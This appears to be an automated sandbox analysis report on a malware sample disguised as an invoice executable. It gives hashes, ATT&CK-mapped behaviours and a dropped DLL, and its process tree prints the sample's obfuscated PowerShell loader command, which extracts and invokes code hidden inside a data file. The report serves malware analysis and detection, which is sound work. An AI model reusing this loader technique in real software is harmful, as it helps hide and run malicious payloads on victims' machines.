Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags
    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/02/2025, 10:00

General

  • Target

    factura_2404047141_2024-09-17T02_00.exe

  • Size

    686KB

  • MD5

    5a38c30a54b3b6f72907b334a5ce8e1a

  • SHA1

    568a123c1b4b5f8b09aef5603c19ceccb4b54850

  • SHA256

    4a4bde620f7d6baf02442d09999d40123bfa471e99fcb53d3617132b678bb6cb

  • SHA512

    719f1b1c287eceefbd56ab5527fa2ba623941f53ae83364ad247b6b9a6572fe12135584dffee46e9959d544f44904d437c1bf1ca252186409bef41cd9de55b80

  • SSDEEP

    12288:7PCMC15K0rytFYPwzrjfa7LvgdtZ+/qb48R15Skemda90xTM:7CM8V+tuPmzaIdt4Ck8Lgkem1xQ

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\factura_2404047141_2024-09-17T02_00.exe
    "C:\Users\Admin\AppData\Local\Temp\factura_2404047141_2024-09-17T02_00.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized "$Smergelpulveret=gc -Raw 'C:\Users\Admin\AppData\Local\Matens\Sexifid126\Sightfulness.Att';$Ationsprogrammet=$Smergelpulveret.SubString(52797,3);.$Ationsprogrammet($Smergelpulveret)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816

Network

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\nst77FE.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b5a1f9dc73e2944a388a61411bdd8c70

    SHA1

    dc9b20df3f3810c2e81a0c54dea385704ba8bef7

    SHA256

    288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

    SHA512

    b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

  • memory/2816-24-0x00000000743E1000-0x00000000743E2000-memory.dmp

    Filesize

    4KB

  • memory/2816-25-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-26-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-27-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-28-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-29-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB